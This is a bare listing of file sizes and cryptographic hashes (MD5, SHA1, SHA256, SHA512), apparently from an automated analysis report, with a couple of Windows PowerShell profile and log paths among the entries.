  SHA256: 8bceef9f732dc07645d2fa959f4413c8800f4bfd8d363893191bf2b224177959
  SHA512: 1cca78cbd44c302baa4d47cf120009d1774f3d1cc6c645407c2c33c5b150bb9123ff7f81a7083978ecf7ddef66dee64a6dd600e390aa2cb6612308939cd18f03
-
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
  Filesize: 151KB
  MD5: a206d7682f73502553d8b8ab59d67964
  SHA1: b3495f942a75f1838965421709d1cc9a880859ea
  SHA256: 1606150edfd864e0c46970719b7c0b4bf16c1c9d06d378db0449e5da47ef7d2e
  SHA512: 7398e0b87c550f96624e293beb47d8c74f8baa50d1f9de1a91b611db527823bcb27aade475d63530e8cd132f650dbe3755b9fc1441e82628d60790ff5afa4d4e
-
  Filesize: 86KB
  MD5: 58e0bc96943228b9973ac98bdcd9b52b
  SHA1: 31d13374c0c0c7d0501dfdfa0368816ff568ebce
  SHA256: 47241bb3631e9328eacc2352bc243eac40244e11523d75c2cbbf0865c2157ac0
  SHA512: 4dd1bf23c3fb5b3f849826afea691bbb6611d625f1b77c76d8a909f1cea57aa7c46c481bdf0b824d6b5dc128f04e46d2c3b6674f66269c287a23599e889f7b64
-
  Filesize: 6KB
  MD5: 64fdd7d874f535355d28bcfd0f0b7d0b
  SHA1: 1607de41d53a9810036b643ae7b10e1ec244f809
  SHA256: 3b0df733db2e8c94eb83eeaead3abd2ab45d6497667067669f06dffa13d3a035
  SHA512: 2484b259fe179082695f30fb1693049612c6c0eabfe755c9e43de3c9a037927ddd2d252782f2f2a8f7541c935a0170bb94ef4eb09cd82e3d1f159206e1ccbb51
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 1KB
  MD5: 33b19d75aa77114216dbc23f43b195e3
  SHA1: 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
  SHA256: b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
  SHA512: 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 11KB
  MD5: fdf99f3f663bd1dc3b8d839e5ed1a1d6
  SHA1: 0b23c7bf7b7536d770d980c0334ac2a3e8a03361
  SHA256: e8b9fdf2acd8943c16985b3c44627b396895d793dddbc45502cb3ba243b2e536
  SHA512: f7aa5b9aa65d8dbfa0ad5b9e6a831b198a9b502457d03edeb03941fc98318c37df5b51013bdc62fc0c4c907c3847459255f7e6f42e7903725068e341f0227c66
-
  Filesize: 216KB
  MD5: b53ac14d3b1ea76140d16b2bf14c0baa
  SHA1: 8daf83bacf17b2a9c8b14cfeb3e65f60400e78d2
  SHA256: f133f3a9902c53fd3dfe244f960efd77f993fc8d081274bc67a5155c93efde51
  SHA512: d279869f5cf02f6d0775967d17269774bdec865eeea1233abaff2ba7193eb22f4a637f31fbb18534482eb29de8af692d6a962d21de26829ef46a04a8860c0ee3
-
  Filesize: 202KB
  MD5: fdf0baf32da9e2694ff9ce61b7535781
  SHA1: 60f1450a50ce14af49aa424b1aaa709c58dd9682
  SHA256: 00dc441d5908c8278754974832807ba3cdc9cac49774bb96a9de690dc90e52f4
  SHA512: 1a1649369b0fe2c54d125fc6b8bf339db399908ebbb37e6fdd3bc028dddfdc87c08879abd73ab934f85c5329c4bdf65ca511446b458582f61596b0214885e999
-
  Filesize: 128KB
  MD5: 2f1fe06ad81a253189c14ed28e44a1f3
  SHA1: 34593175c3e145200363559469dc84db0e0ef3e1
  SHA256: fe5819fd23895531a2a0bd5ca402cfd1f99de1d5098d48d359bdffe590664505
  SHA512: bbd6fb9203af9ea20ac123054249bb12a6887bb0945817a219c39338ff0a18dc64959ed0674184d097ddcaf0dcd3510f04ec48b28792ea3c6b15dbc2f747dcad
-
  Filesize: 78KB
  MD5: 4dbdea43bf2d11f4dd7c3b38f6e3c4dc
  SHA1: db84a820dc882c506b0e4f13691fa874ddcdd6a6
  SHA256: c0c938086da5424b80dd5a6586a0518115c6b721109ade09d76baea9f84f8394
  SHA512: 3fbd58e18fe160653a239274cdcf86e801467737b4af48578fe999ffc824e192f3fe4367036d86ae8380e49955ff48d1a2fd6e873f67b0a477e89abe244d174d
-
  Filesize: 107KB
  MD5: bf14efc6fe4098cd0deda76bc1b44d79
  SHA1: 03480f9f50c8671e15a23f643cd27fa865563d39
  SHA256: 9dcf4580df150a4d9b060aa00ee4a486a7f3af715edb97e89c62dd2bd38aa805
  SHA512: 2ca956d9e50ba7e7778c44ac602fe2549cc84240bad2280ae56cadf4246e2cbcc3f4b88799d77f79f64c78038cd0433083255c23ca77168607c0188086c53bc6
-
  Filesize: 6KB
  MD5: 3763fb04740bc20a4c3d141bf819f5ed
  SHA1: 5f568d5d23ccc0a7f6e7b7ec907d6e9877ed0c3d
  SHA256: 1d87f75129a41d56ccf385c10ee1543261c43f90f4f0b872ea0008d832efc520
  SHA512: 1e1a60e55ba7130383286934a8fe6087f8522048d8255f2e86464e51ce05a9f1b5aabeeb2c04f6c41b9cbaaf85a475199a5cfa29593cef1da902c89d090f7375
-
  Filesize: 268B
  MD5: a62ce44a33f1c05fc2d340ea0ca118a4
  SHA1: 1f03eb4716015528f3de7f7674532c1345b2717d
  SHA256: 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
  SHA512: 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732